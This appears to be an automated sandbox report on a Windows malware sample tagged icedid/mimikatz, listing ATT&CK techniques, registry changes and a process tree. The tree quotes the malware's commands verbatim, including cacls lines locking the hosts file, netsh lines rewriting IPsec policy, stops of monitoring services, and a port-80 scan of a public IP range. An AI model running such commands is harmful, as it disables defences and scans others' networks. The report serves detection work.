Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ktlbbtb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tzmttvjbt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ktlbbtb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	btpbguneu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4080	PING.EXE
2340	cmd.exe

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0007000000023c88-6.dat	nsis_installer_2
behavioral2/files/0x0007000000023ca0-15.dat	nsis_installer_1
behavioral2/files/0x0007000000023ca0-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ktlbbtb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ktlbbtb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ktlbbtb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ktlbbtb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ktlbbtb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	yubiiieib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ktlbbtb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	yubiiieib.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	ktlbbtb.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4080	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4948	schtasks.exe
1196	schtasks.exe
1528	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
3012	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	3012	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	1940	ktlbbtb.exe
Token: SeDebugPrivilege	3596	ktlbbtb.exe
Token: SeDebugPrivilege	3676	vfshost.exe
Token: SeDebugPrivilege	4572	yubiiieib.exe
Token: SeLockMemoryPrivilege	1520	btcbnp.exe
Token: SeLockMemoryPrivilege	1520	btcbnp.exe
Token: SeDebugPrivilege	4552	yubiiieib.exe
Token: SeDebugPrivilege	2596	yubiiieib.exe
Token: SeDebugPrivilege	4520	yubiiieib.exe
Token: SeDebugPrivilege	4544	yubiiieib.exe
Token: SeDebugPrivilege	2420	yubiiieib.exe
Token: SeDebugPrivilege	4528	yubiiieib.exe
Token: SeDebugPrivilege	3508	yubiiieib.exe
Token: SeDebugPrivilege	2876	yubiiieib.exe
Token: SeDebugPrivilege	1304	yubiiieib.exe
Token: SeDebugPrivilege	4424	yubiiieib.exe
Token: SeDebugPrivilege	4396	yubiiieib.exe
Token: SeDebugPrivilege	2956	yubiiieib.exe
Token: SeDebugPrivilege	2436	yubiiieib.exe
Token: SeDebugPrivilege	60	yubiiieib.exe
Token: SeDebugPrivilege	964	yubiiieib.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3012	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe
3012	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe
1940	ktlbbtb.exe
1940	ktlbbtb.exe
3596	ktlbbtb.exe
3596	ktlbbtb.exe
3676	xohudmc.exe
4836	tyxtue.exe
3656	ktlbbtb.exe
3656	ktlbbtb.exe
5468	ktlbbtb.exe
5468	ktlbbtb.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 2340	3012	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe	82
PID 3012 wrote to memory of 2340	3012	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe	82
PID 3012 wrote to memory of 2340	3012	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe	82
PID 2340 wrote to memory of 4080	2340	cmd.exe	84
PID 2340 wrote to memory of 4080	2340	cmd.exe	84
PID 2340 wrote to memory of 4080	2340	cmd.exe	84
PID 2340 wrote to memory of 1940	2340	cmd.exe	85
PID 2340 wrote to memory of 1940	2340	cmd.exe	85
PID 2340 wrote to memory of 1940	2340	cmd.exe	85
PID 3596 wrote to memory of 460	3596	ktlbbtb.exe	87
PID 3596 wrote to memory of 460	3596	ktlbbtb.exe	87
PID 3596 wrote to memory of 460	3596	ktlbbtb.exe	87
PID 460 wrote to memory of 3532	460	cmd.exe	89
PID 460 wrote to memory of 3532	460	cmd.exe	89
PID 460 wrote to memory of 3532	460	cmd.exe	89
PID 460 wrote to memory of 4776	460	cmd.exe	90
PID 460 wrote to memory of 4776	460	cmd.exe	90
PID 460 wrote to memory of 4776	460	cmd.exe	90
PID 460 wrote to memory of 316	460	cmd.exe	91
PID 460 wrote to memory of 316	460	cmd.exe	91
PID 460 wrote to memory of 316	460	cmd.exe	91
PID 460 wrote to memory of 5048	460	cmd.exe	92
PID 460 wrote to memory of 5048	460	cmd.exe	92
PID 460 wrote to memory of 5048	460	cmd.exe	92
PID 460 wrote to memory of 1840	460	cmd.exe	93
PID 460 wrote to memory of 1840	460	cmd.exe	93
PID 460 wrote to memory of 1840	460	cmd.exe	93
PID 460 wrote to memory of 1448	460	cmd.exe	94
PID 460 wrote to memory of 1448	460	cmd.exe	94
PID 460 wrote to memory of 1448	460	cmd.exe	94
PID 3596 wrote to memory of 1696	3596	ktlbbtb.exe	95
PID 3596 wrote to memory of 1696	3596	ktlbbtb.exe	95
PID 3596 wrote to memory of 1696	3596	ktlbbtb.exe	95
PID 3596 wrote to memory of 4144	3596	ktlbbtb.exe	97
PID 3596 wrote to memory of 4144	3596	ktlbbtb.exe	97
PID 3596 wrote to memory of 4144	3596	ktlbbtb.exe	97
PID 3596 wrote to memory of 2152	3596	ktlbbtb.exe	99
PID 3596 wrote to memory of 2152	3596	ktlbbtb.exe	99
PID 3596 wrote to memory of 2152	3596	ktlbbtb.exe	99
PID 3596 wrote to memory of 3760	3596	ktlbbtb.exe	108
PID 3596 wrote to memory of 3760	3596	ktlbbtb.exe	108
PID 3596 wrote to memory of 3760	3596	ktlbbtb.exe	108
PID 3760 wrote to memory of 4752	3760	cmd.exe	110
PID 3760 wrote to memory of 4752	3760	cmd.exe	110
PID 3760 wrote to memory of 4752	3760	cmd.exe	110
PID 4752 wrote to memory of 2968	4752	wpcap.exe	111
PID 4752 wrote to memory of 2968	4752	wpcap.exe	111
PID 4752 wrote to memory of 2968	4752	wpcap.exe	111
PID 2968 wrote to memory of 1332	2968	net.exe	113
PID 2968 wrote to memory of 1332	2968	net.exe	113
PID 2968 wrote to memory of 1332	2968	net.exe	113
PID 4752 wrote to memory of 2376	4752	wpcap.exe	114
PID 4752 wrote to memory of 2376	4752	wpcap.exe	114
PID 4752 wrote to memory of 2376	4752	wpcap.exe	114
PID 2376 wrote to memory of 2356	2376	net.exe	116
PID 2376 wrote to memory of 2356	2376	net.exe	116
PID 2376 wrote to memory of 2356	2376	net.exe	116
PID 4752 wrote to memory of 3004	4752	wpcap.exe	117
PID 4752 wrote to memory of 3004	4752	wpcap.exe	117
PID 4752 wrote to memory of 3004	4752	wpcap.exe	117
PID 3004 wrote to memory of 1116	3004	net.exe	119
PID 3004 wrote to memory of 1116	3004	net.exe	119
PID 3004 wrote to memory of 1116	3004	net.exe	119
PID 4752 wrote to memory of 2440	4752	wpcap.exe	120

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2132
- C:\Windows\TEMP\uivtbcilg\btcbnp.exe
  "C:\Windows\TEMP\uivtbcilg\btcbnp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1520

C:\Users\Admin\AppData\Local\Temp\2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\izcmeubg\ktlbbtb.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4080
- - C:\Windows\izcmeubg\ktlbbtb.exe
    C:\Windows\izcmeubg\ktlbbtb.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1940

C:\Windows\izcmeubg\ktlbbtb.exe
C:\Windows\izcmeubg\ktlbbtb.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:316
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1840
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:1448
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1696
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4144
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2152
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\mpbivectb\iuzcjcmlt\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3760
- - C:\Windows\mpbivectb\iuzcjcmlt\wpcap.exe
    C:\Windows\mpbivectb\iuzcjcmlt\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2968
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:1332
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2376
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:2356
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3004
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:1116
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:2440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2496
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4784
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:3400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\mpbivectb\iuzcjcmlt\tzmttvjbt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mpbivectb\iuzcjcmlt\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4300
- - C:\Windows\mpbivectb\iuzcjcmlt\tzmttvjbt.exe
    C:\Windows\mpbivectb\iuzcjcmlt\tzmttvjbt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mpbivectb\iuzcjcmlt\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2512
- C:\Windows\SysWOW64\cmd.exe
